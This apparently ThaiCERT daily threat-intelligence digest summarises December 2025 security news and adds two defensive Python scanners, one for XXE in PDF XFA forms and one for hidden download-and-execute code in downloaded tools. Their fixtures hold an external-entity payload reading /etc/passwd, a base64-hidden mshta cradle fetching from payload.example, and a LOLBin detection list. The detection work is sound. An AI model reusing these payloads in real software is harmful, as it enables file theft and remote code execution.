NCSA Webboard

    Cyber Threat Intelligence 16 December 2025

    Cyber Security News
    Posted by NCSA_THAICERT

      New Tooling

      • Prometheus: Open-Source Metrics And Monitoring Systems And Services
        "Prometheus is an open-source monitoring and alerting system built for environments where services change often and failures can spread fast. For security teams and DevOps engineers, it has become a common way to track system behavior, spot early warning signs, and understand what is happening across large sets of workloads."
        https://www.helpnetsecurity.com/2025/12/15/prometheus-open-source-metrics-monitoring-systems-services/
        https://github.com/prometheus/prometheus

      Vulnerabilities

      • Atlassian Patches Critical Apache Tika Flaw
        "Atlassian has rolled out patches for roughly 30 third-party vulnerabilities impacting its products, including critical-severity flaws. The first security defect that stands out is CVE-2025-66516 (CVSS score of 10/10), a critical-severity XML External Entity (XXE) injection bug in Apache Tika. Impacting the tika-core, tika-pdf-module, and tika-parsers modules of the universal parser, the flaw was disclosed in early December. It can be exploited via crafted XFA files placed inside PDF files, potentially leading to information leaks, denial-of-service (DoS), SSRF attacks, or remote code execution (RCE)."
        https://www.securityweek.com/atlassian-patches-critical-apache-tika-flaw/
        https://securityaffairs.com/185710/security/atlassian-fixed-maximum-severity-flaw-cve-2025-66516-in-apache-tika.html
      • FreePBX Patches Critical SQLi, File-Upload, And AUTHTYPE Bypass Flaws Enabling RCE
        "Multiple security vulnerabilities have been disclosed in the open-source private branch exchange (PBX) platform FreePBX, including a critical flaw that could result in an authentication bypass under certain configurations. The shortcomings, discovered by Horizon3.ai and reported to the project maintainers on September 15, 2025, are listed below -"
        https://thehackernews.com/2025/12/freepbx-authentication-bypass-exposed.html
      • CISA Adds Two Known Exploited Vulnerabilities To Catalog
        "CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-14611 Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
        CVE-2025-43529 Apple Multiple Products Use-After-Free WebKit Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/12/15/cisa-adds-two-known-exploited-vulnerabilities-catalog
        https://securityaffairs.com/185716/hacking/u-s-cisa-adds-apple-and-gladinet-centrestack-and-triofox-flaws-to-its-known-exploited-vulnerabilities-catalog.html
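The Apache Tika item above describes XXE payloads delivered as XFA forms inside PDF files. The following is an added example, not code from this digest, from Atlassian, or from the Apache Tika project: a Python pre-screen that pulls XML-bearing streams out of a PDF, inflates FlateDecode streams, and flags any DTD that declares an external or parameter entity, which is the construct an XXE payload needs. The minimal PDF builder and the two XFA packets are constructed fixtures for the example (the `file:///etc/passwd` target and the object layout are assumptions, not details from the reported samples).

```python
import re
import zlib

# PDF stream bodies, tolerant of CRLF or LF around the keywords.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# Content that looks like an XML document, including an XFA (XDP) packet.
XML_HINT_RE = re.compile(rb"<\?xml|<xdp:xdp|<template")
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
# External general entities and parameter entities declared in a DTD internal subset, e.g.
#   <!ENTITY xxe SYSTEM "file:///etc/passwd">   or   <!ENTITY % dtd SYSTEM "http://...">
EXT_ENTITY_RE = re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def _inflate(body: bytes) -> bytes:
    """Return stream content: inflate FlateDecode streams, pass raw streams through.

    A decompress object is used instead of zlib.decompress so that a trailing
    byte swallowed by the end-of-stream match does not turn into a false error.
    """
    try:
        return zlib.decompressobj().decompress(body)
    except zlib.error:
        return body


def scan_pdf_for_xml_entities(pdf: bytes) -> dict:
    """Pre-screen a PDF for XML streams whose DTD declares external or parameter entities.

    Returns whether an /XFA key is present, how many XML-looking streams were
    seen, the offending entity declarations, and a single 'suspicious' verdict.
    """
    findings = []
    xml_streams = 0
    for match in STREAM_RE.finditer(pdf):
        data = _inflate(match.group(1))
        if not XML_HINT_RE.search(data):
            continue
        xml_streams += 1
        if DOCTYPE_RE.search(data):
            findings.extend(m.group(0).decode("latin-1") for m in EXT_ENTITY_RE.finditer(data))
    return {
        "has_xfa": b"/XFA" in pdf,
        "xml_streams": xml_streams,
        "external_entities": findings,
        "suspicious": bool(findings),
    }


def build_pdf_with_xfa(xml: bytes, compress: bool = False) -> bytes:
    """Constructed test fixture: a minimal PDF whose AcroForm points at an /XFA stream.

    Only the pieces this scanner reads are present; it is not a spec-complete file.
    """
    body = zlib.compress(xml) if compress else xml
    flt = b"/Filter /FlateDecode " if compress else b""
    return (
        b"%PDF-1.7\n"
        b"1 0 obj << /Type /Catalog /AcroForm 2 0 R >> endobj\n"
        b"2 0 obj << /XFA 3 0 R >> endobj\n"
        b"3 0 obj << " + flt + b"/Length " + str(len(body)).encode() + b" >>\nstream\n"
        + body + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


# Constructed XFA packets: one declaring an external entity, one benign.
MALICIOUS_XFA = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE xdp [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template>&xxe;</template></xdp:xdp>'
)
BENIGN_XFA = (
    b'<?xml version="1.0"?>'
    b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template><subform name="form1"/></template></xdp:xdp>'
)

if __name__ == "__main__":
    print(scan_pdf_for_xml_entities(build_pdf_with_xfa(MALICIOUS_XFA, compress=True)))
    print(scan_pdf_for_xml_entities(build_pdf_with_xfa(BENIGN_XFA)))
```

This is a triage filter for a mail gateway or upload handler, not a substitute for applying the vendor patches: a PDF can carry its XFA under filters or inside object streams that this minimal scanner does not decode, so treat a clean result as "no obvious DTD", not as safe.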

      Malware

      • Frogblight Threatens You With a Court Case: a New Android Banker Targets Turkish Users
        "In August 2025, we discovered a campaign targeting individuals in Turkey with a new Android banking Trojan we dubbed “Frogblight”. Initially, the malware was disguised as an app for accessing court case files via an official government webpage. Later, more universal disguises appeared, such as the Chrome browser. Frogblight can use official government websites as an intermediary step to steal banking credentials. Moreover, it has spyware functionality, such as capabilities to collect SMS messages, a list of installed apps on the device and device filesystem information. It can also send arbitrary SMS messages."
        https://securelist.com/frogblight-banker/118440/
      • Threats Behind The Mask Of Gentlemen Ransomware
        "Gentlemen is a new ransomware group first identified around August 2025. The group operates a double extortion model that involves breaching corporate networks, exfiltrating data, encrypting the data, and then using the encrypted data to extort victims. During the breach, the group employs typical tactics seen in advanced ransomware groups, such as Group Policy Objects (GPO) manipulation and Bring Your Own Vulnerable Driver (BYOVD). As of now, there is no clear evidence that the group is operating on a Ransomware as a Service (RaaS) model. Additionally, it is yet to be confirmed whether the group is a rebranding of an existing ransomware group or a sub-group."
        https://asec.ahnlab.com/en/91545/
      • SantaStealer Is Coming To Town: A New, Ambitious Infostealer Advertised On Underground Forums
        "Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.” The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection. Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP."
        https://www.rapid7.com/blog/post/tr-santastealer-is-coming-to-town-a-new-ambitious-infostealer-advertised-on-underground-forums/
        https://www.bleepingcomputer.com/news/security/new-santastealer-malware-steals-data-from-browsers-crypto-wallets/
      • Askul Confirms Theft Of 740k Customer Records In Ransomware Attack
        "Japanese e-commerce giant Askul Corporation has confirmed that RansomHouse hackers stole around 740,000 customer records in the ransomware attack it suffered in October. Askul is a large business-to-business and business-to-consumer office supplies and logistics e-commerce company owned by Yahoo! Japan Corporation. The ransomware incident in October caused an IT system failure, forcing the company to suspend shipments to customers, including the retail giant Muji."
        https://www.bleepingcomputer.com/news/security/askul-confirms-theft-of-740k-customer-records-in-ransomhouse-attack/
      • Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)
        "On Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (aka "React2Shell"), was publicly disclosed. Shortly after disclosure, Google Threat Intelligence Group (GTIG) had begun observing widespread exploitation across many threat clusters, ranging from opportunistic cyber crime actors to suspected espionage groups. GTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of which overlaps with activity previously reported by Huntress."
        https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182/
        https://www.bleepingcomputer.com/news/security/google-links-more-chinese-hacking-groups-to-react2shell-attacks/
        https://www.bankinfosecurity.com/nation-state-cybercrime-exploits-tied-to-react2shell-a-30285
        https://www.securityweek.com/google-sees-5-chinese-groups-exploiting-react2shell-for-malware-delivery/
        https://www.theregister.com/2025/12/15/react2shell_flaw_china_iran/
      • GitHub Scanner For React2Shell (CVE-2025-55182) Turns Out To Be Malware
        "A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, also referred to as “React2Shell,” was exposed as malicious after spreading malware. The project, named React2shell-scanner, was hosted under the user niha0wa and has since been removed from the platform following community reports. Saurabh, a cybersecurity researcher, flagged the now-deleted tool on LinkedIn last week after identifying suspicious behaviour in the code. According to his post, the script included a hidden payload designed to execute mshta.exe and fetch a remote file from py-installer.cc, a known technique used to drop second-stage malware."
        https://hackread.com/github-scanner-react2shell-cve-2025-55182-malware/
      • Operation MoneyMount-ISO — Deploying Phantom Stealer Via ISO-Mounted Executables
        "At Seqrite Labs, we continuously monitor global cyber threat activity. During ongoing threat monitoring, the Seqrite Labs Researcher Team identified an active phishing campaign originating from Russia. This campaign employs a fake payment confirmation lure to deliver the Phantom information-stealing malware through a multi-stage attachment chain. The attack initiates with a social engineering email masquerading as a legitimate financial correspondence, claiming to confirm a payment transaction. The email contains a malicious ZIP archive, which, when opened, triggers the execution of the payload."
        https://www.seqrite.com/blog/operation-moneymount-iso-deploying-phantom-stealer-via-iso-mounted-executables/
        https://thehackernews.com/2025/12/phantom-stealer-spread-by-iso-phishing.html
        https://www.infosecurity-magazine.com/news/russian-phishing-phantom-stealer/
      • 8 Million Users' AI Conversations Sold For Profit By "Privacy" Extensions
        "A few weeks ago, I was wrestling with a major life decision. Like I've grown used to doing, I opened Claude and started thinking out loud, laying out the options, weighing the tradeoffs, asking for perspective. Midway through the conversation, I paused. I realized how much I'd shared: not just this decision, but months of conversations: personal dilemmas, health questions, financial details, work frustrations, things I hadn't told anyone else. I'd developed a level of candor with my AI assistant that I don't have with most people in my life. And then an uncomfortable thought: what if someone was reading all of this?"
        https://www.koi.ai/blog/urban-vpn-browser-extension-ai-conversations-data-collection
        https://thehackernews.com/2025/12/featured-chrome-browser-extension.html
      • Amazon Threat Intelligence Identifies Russian Cyber Threat Group Targeting Western Critical Infrastructure
        "As we conclude 2025, Amazon Threat Intelligence is sharing insights about a years-long Russian state-sponsored campaign that represents a significant evolution in critical infrastructure targeting: a tactical pivot where what appear to be misconfigured customer network edge devices became the primary initial access vector, while vulnerability exploitation activity declined. This tactical adaptation enables the same operational outcomes, credential harvesting, and lateral movement into victim organizations’ online services and infrastructure, while reducing the actor’s exposure and resource expenditure."
        https://aws.amazon.com/blogs/security/amazon-threat-intelligence-identifies-russian-cyber-threat-group-targeting-western-critical-infrastructure/
        https://www.theregister.com/2025/12/15/amazon_ongoing_gru_campaign/
      • GOLD SALEM Tradecraft For Deploying Warlock Ransomware
        "In mid-August 2025, Counter Threat Unit™ (CTU) researchers identified the use of the legitimate Velociraptor digital forensics and incident response (DFIR) tool in likely ransomware precursor activity. Subsequent investigation and analysis of events in customer environments led CTU™ researchers to assess with high confidence that these incidents occurred with intent to deploy Warlock ransomware, which is operated by the GOLD SALEM cybercrime group."
        https://news.sophos.com/en-us/2025/12/11/gold-salem-tradecraft-for-deploying-warlock-ransomware/
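The React2Shell "scanner" item above is a reminder that community proof-of-concept tools need a read-through before they are run: the reported repository hid a payload that launched mshta.exe to fetch a remote file. The following is an added example, not code from this digest or from the researcher's post: a Python reviewer that scans a downloaded script, plus every long base64 string literal it decodes, for LOLBin names, command or code execution primitives, and URLs pointing at hosts the tool is not expected to talk to. The two sample scripts are constructed fixtures, not the real repository; `payload.example` and the probe logic are placeholders.

```python
import base64
import re
from urllib.parse import urlparse

# LOLBins a read-only vulnerability scanner has no business invoking.
LOLBIN_RE = re.compile(
    r"\b(mshta|rundll32|regsvr32|certutil|bitsadmin|wscript|cscript|powershell)(?:\.exe)?\b",
    re.IGNORECASE,
)
# Python primitives that execute commands or dynamically generated code.
EXEC_RE = re.compile(r"\b(subprocess\.(?:Popen|run|call|check_output)|os\.system|os\.popen|exec\(|eval\()")
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
# Long base64-looking string literals: the usual home of a "hidden payload".
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")


def _decoded_base64_literals(source: str) -> list:
    """Decode every long base64 literal that is valid base64 and valid UTF-8 text."""
    decoded = []
    for m in B64_LITERAL_RE.finditer(source):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
    return decoded


def _scan_text(text: str, expected_hosts: set) -> dict:
    """Collect LOLBin names, exec primitives and URL hosts outside the expected set."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
    return {
        "lolbins": sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(text)}),
        "exec_primitives": sorted({m.group(1) for m in EXEC_RE.finditer(text)}),
        "unexpected_hosts": sorted(h for h in hosts if h and h not in expected_hosts),
    }


def review_tool_source(source: str, expected_hosts=()) -> dict:
    """Review a downloaded script for download-and-execute behaviour before running it.

    The plain text and every decoded base64 literal are scanned. Code hidden in
    base64 counts as suspicious on its own, since a scanner has no reason to
    conceal its logic. Anywhere, a LOLBin name, or an exec primitive together
    with a URL on an unexpected host, is enough to stop and read the code.
    """
    expected = set(expected_hosts)
    plain = _scan_text(source, expected)
    hidden = [_scan_text(d, expected) for d in _decoded_base64_literals(source)]
    hidden_code = any(v["lolbins"] or v["exec_primitives"] or v["unexpected_hosts"] for v in hidden)
    views = [plain] + hidden
    lolbin_use = any(v["lolbins"] for v in views)
    download_and_exec = any(v["exec_primitives"] and v["unexpected_hosts"] for v in views)
    return {"plain": plain, "hidden": hidden, "suspicious": lolbin_use or hidden_code or download_and_exec}


# Constructed fixtures (not the real repository): the hostile one hides an mshta
# download cradle in a base64 literal that the visible code exec()s at import time.
_HIDDEN = base64.b64encode(
    b'subprocess.Popen(["mshta.exe", "https://payload.example/stage2.hta"])'
).decode()
FAKE_SCANNER = f'''
import base64, requests, subprocess
def check(target):
    return requests.get(target + "/", timeout=5).status_code  # placeholder probe
exec(base64.b64decode("{_HIDDEN}"))
'''
CLEAN_SCANNER = '''
import requests
def check(target):
    return requests.get(target + "/", timeout=5).status_code  # placeholder probe
'''

if __name__ == "__main__":
    for name, src in (("fake", FAKE_SCANNER), ("clean", CLEAN_SCANNER)):
        print(name, review_tool_source(src))
```

Run it over the script and over anything the script fetches before executing either, and put only hosts the tool legitimately needs into `expected_hosts`. It is a review aid, not an antivirus: hex, XOR or string-concatenation obfuscation will slip past these regexes, which is itself the point, because a vulnerability scanner that needs obfuscation at all should not be run.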

      Breaches/Hacks/Leaks

      • PornHub Extorted After Hackers Steal Premium Member Activity Data
        "Adult video platform PornHub is being extorted by the ShinyHunters extortion gang after the search and watch history of its Premium members was reportedly stolen in a recent Mixpanel data breach. Last week, PornHub disclosed that it was impacted by a recent breach at analytics vendor Mixpanel. Mixpanel suffered a breach on November 8th, 2025, after an SMS phishing (smishing) attack enabled threat actors to compromise its systems. "A recent cybersecurity incident involving Mixpanel, a third-party data analytics provider, has impacted some Pornhub Premium users," reads a PornHub security notice posted on Friday."
        https://www.bleepingcomputer.com/news/security/pornhub-extorted-after-hackers-steal-premium-member-activity-data/
      • 700Credit Data Breach Impacts 5.8 Million Vehicle Dealership Customers
        "700Credit, a U.S.-based financial services and fintech company, will start notifying more than 5.8 million people that their personal information has been exposed in a data breach incident. The cyberattack occurred after a threat actor had breached one of 700Credit's integration partners in July and discovered an API for obtaining customer information. However, the partner did not inform 700Credit of the compromise."
        https://www.bleepingcomputer.com/news/security/700credit-data-breach-impacts-58-million-vehicle-dealership-customers/
        https://therecord.media/data-breaches-affecting-20-million-prosper-700credit
        https://www.securityweek.com/700credit-data-breach-impacts-5-8-million-individuals/
        https://securityaffairs.com/185692/data-breach/u-s-fintech-and-data-services-firm-700credit-suffered-a-data-breach-impacting-at-least-5-6-million-people.html
      • Youth Sports, NCAA Insurance Claims Potentially Hacked
        "A Maine-based third-party administrator that handles healthcare claims involving day care centers, youth sports and NCAA athlete accidents is notifying more than 181,000 claimants that their medical information and personal identifiers may have been accessed or stolen in an April hacking incident. National Accident Health General Agency, or NAHGA, describes itself as a third-party administrator that focuses on secondary accident insurance claims processing for clients across the country."
        https://www.bankinfosecurity.com/youth-sports-ncaa-insurance-claims-potentially-hacked-a-30292
      • Jaguar Land Rover Confirms Staff Data Stolen In Cyberattack
        "British car manufacturer Jaguar Land Rover (JLR) has confirmed data belonging to current and former employees was compromised in a cyberattack that struck in August. The announcement is the first time the company has provided any details about the attack, which halted production for more than a month, ultimately leaving JLR short of more than $890 million."
        https://therecord.media/jaguar-land-rover-confirms-staff-data-stolen-cyberattack
        https://www.theregister.com/2025/12/15/jlr_payroll_data_stolen_in/
      • SoundCloud Confirms Breach After Member Data Stolen, VPN Access Disrupted
        "Audio streaming platform SoundCloud has confirmed that outages and VPN connection issues over the past few days were caused by a security breach in which threat actors stole a database containing user information. The disclosure follows widespread reports over the past four days from users who were unable to access SoundCloud when connecting via VPN, with attempts resulting in the site displaying 403 "forbidden" errors. In a statement shared with BleepingComputer, SoundCloud said it recently detected unauthorized activity involving an ancillary service dashboard and activated its incident response procedures."
        https://www.bleepingcomputer.com/news/security/soundcloud-confirms-breach-after-member-data-stolen-vpn-access-disrupted/

      General News

      • Europe’s DMA Raises New Security Worries For Mobile Ecosystems
        "Mobile security has long depended on tight control over how apps and services interact with a device. A new paper from the Center for Cybersecurity Policy and Law warns that this control may weaken as the European Union’s Digital Markets Act pushes mobile platforms to open core functions to outside developers. The report explains that the DMA requires large platform providers to support free interoperability with mobile hardware and software features that sit deep in the operating system. These internal functions were never designed for open access. This single requirement introduces a set of risks that grow as more system components are exposed."
        https://www.helpnetsecurity.com/2025/12/15/eu-dma-mobile-security-risks/
        https://cdn.prod.website-files.com/660ab0cd271a25abeb800460/692f22683cc0c02728db52bb_Europe_DMA_All_120325.pdf
      • How Researchers Are Teaching AI Agents To Ask For Permission The Right Way
        "People are starting to hand more decisions to AI agents, from booking trips to sorting digital files. The idea sounds simple. Tell the agent what you want, then let it work through the steps. The hard part is what the agent does with personal data along the way. A new research study digs into this problem, and asks a basic question. How should an AI agent know when to use someone’s data without asking every time?"
        https://www.helpnetsecurity.com/2025/12/15/research-ai-agent-permissions/
        https://arxiv.org/pdf/2511.17959
      • From Fake Deals To Phishing: The Most Effective Christmas Scams Of 2025
        "As the season of giving unfolds, cyber criminals are taking advantage of holiday stress and speed. In 2025, scams are not only more common, they’re powered by AI and automation, making them harder to spot. Researchers at Check Point detected 33,502 Christmas-themed phishing emails in the past two weeks alone, along with more than 10,000 fake advertisements being created daily on social media channels. Many mimic festive promotions, while others push fake Walmart or Home Depot deals, fraudulent charity appeals, and urgent delivery notices."
        https://blog.checkpoint.com/research/from-fake-deals-to-phishing-the-most-effective-christmas-scams-of-2025/
      • Think Like An Attacker: Cybersecurity Tips From Cato Networks' CISO
        "Welcome to Dark Reading's Heard it From a CISO video series, which offers advice on breaking into and advancing within the cybersecurity field from those who have been there. Cybersecurity is a field that touches every aspect of modern life, from personal privacy to global business operations. In Dark Reading's latest episode, Etay Maor, chief security strategist at Cato Networks and professor at Boston College, shares his journey, expertise, and advice for those interested in entering this ever-evolving domain."
        https://www.darkreading.com/cybersecurity-operations/cybersecurity-tips-cato-networks-ciso
      • The 2025 Cloudflare Radar Year In Review: The Rise Of AI, Post-Quantum, And Record-Breaking DDoS Attacks
        "The 2025 Cloudflare Radar Year in Review is here: our sixth annual review of the Internet trends and patterns we observed throughout the year, based on Cloudflare’s expansive network view. Our view is unique, due to Cloudflare’s global network, which has a presence in 330 cities in over 125 countries/regions, handling over 81 million HTTP requests per second on average, with more than 129 million HTTP requests per second at peak on behalf of millions of customer Web properties, in addition to responding to approximately 67 million (authoritative + resolver) DNS queries per second."
        https://blog.cloudflare.com/radar-2025-year-in-review/
        https://www.helpnetsecurity.com/2025/12/15/cloudflare-internet-trends-2025/
      • Militant Groups Are Experimenting With AI, And The Risks Are Expected To Grow
        "As the rest of the world rushes to harness the power of artificial intelligence, militant groups also are experimenting with the technology, even if they aren’t sure exactly what to do with it. For extremist organizations, AI could be a powerful tool for recruiting new members, churning out realistic deepfake images and refining their cyberattacks, national security experts and spy agencies have warned. Someone posting on a pro-Islamic State group website last month urged other IS supporters to make AI part of their operations. “One of the best things about AI is how easy it is to use,” the user wrote in English."
        https://www.securityweek.com/militant-groups-are-experimenting-with-ai-and-the-risks-are-expected-to-grow/
      • Analyzing Partially Encrypted Network Flows With Mid-Encryption
        "Encrypted traffic has come to dominate network flows, which makes it difficult for traditional flow monitoring tools to maintain visibility. This is particularly true when the process to enable encryption occurs after an initial data exchange, causing the encryption attributes to be missed. In this blog post we take a closer look at a new feature added to CERT’s Yet Another Flowmeter tool (YAF) to capture the attributes of encryption when it occurs after the start of the session. We call this mid-encryption. We explore what mid-encryption means, why it matters, how it works within YAF, and what benefits this brings to traffic analysis and network security teams."
        https://www.sei.cmu.edu/blog/analyzing-partially-encrypted-network-flows-with-mid-encryption/
      • The 2025 ITRC Consumer Impact Report: A New Era Of Identity Crime
        "Founded in 1999, the Identity Theft Resource Center (ITRC) is a national nonprofit dedicated to empowering and guiding consumers, victims, businesses and government agencies to minimize risk and mitigate the impact of identity compromise and crime. The ITRC provides free victim assistance and consumer education through its website, live chat and toll-free phone support. It also tracks data breaches and offers resources for both individuals and businesses to stay informed and protected, including an annual report on the previous year’s trends in identity theft and data breaches. The 2025 ITRC Consumer Impact Report was published recently, and its tone is markedly more urgent than previous years’ reports."
        https://blog.barracuda.com/2025/12/15/2025-irtc-consumer-impact-report-new-era-identity-crime
        https://www.idtheftcenter.org/publication/itrc-2025-consumer-impact-report/
      • Third DraftKings Hacker Pleads Guilty
        "Nathan Austad is the third individual to plead guilty to launching a credential stuffing attack against a fantasy sports and betting website, the DoJ announced. Austad, 21, of Farmington, Minnesota, also known as ‘Snoopy’, admitted in court to his role in a scheme to hack thousands of user accounts and sell access to them to drain their funds. According to documents and statements presented in court, Austad and his co-conspirators compromised over 60,000 user accounts at the betting website."
        https://www.securityweek.com/third-draftkings-hacker-pleads-guilty/
      • CERT-FR Recommends Completely Deactivating Wi-Fi Whenever It’s Not In Use
        "The CERT-FR (French Computer Emergency Response Team) is advising iPhone and Android users to fully disable Wi-Fi to reduce risk. CERT-FR warns iPhone and Android users to fully disable Wi-Fi to reduce exposure, citing multiple vulnerabilities across wireless interfaces, apps, OSs, and even hardware. The agency reiterates basic hygiene: install apps only from official stores, review permissions, keep devices updated and rebooted, use a VPN on public Wi-Fi, and disable auto-join on open networks."
        https://securityaffairs.com/185702/hacking/cert-fr-recommends-completely-deactivate-wi-fi-whenever-its-not-in-use.html
      • The Budget Effect Of a Security Incident
        "As sophisticated cyber-attacks increasingly target SaaS data, both vendors and customers are pushing to increase investments in SaaS security. Vendors are dedicating substantial resources to product development, incident communication and customer outreach. Simultaneously, many customers are elevating SaaS security conversations to their CISOs and Information Security (InfoSec) teams. Others are still considering their options and their risk appetites."
        https://www.infosecurity-magazine.com/blogs/the-budget-effect-of-a-security/

      Reference
      Electronic Transactions Development Agency (ETDA)
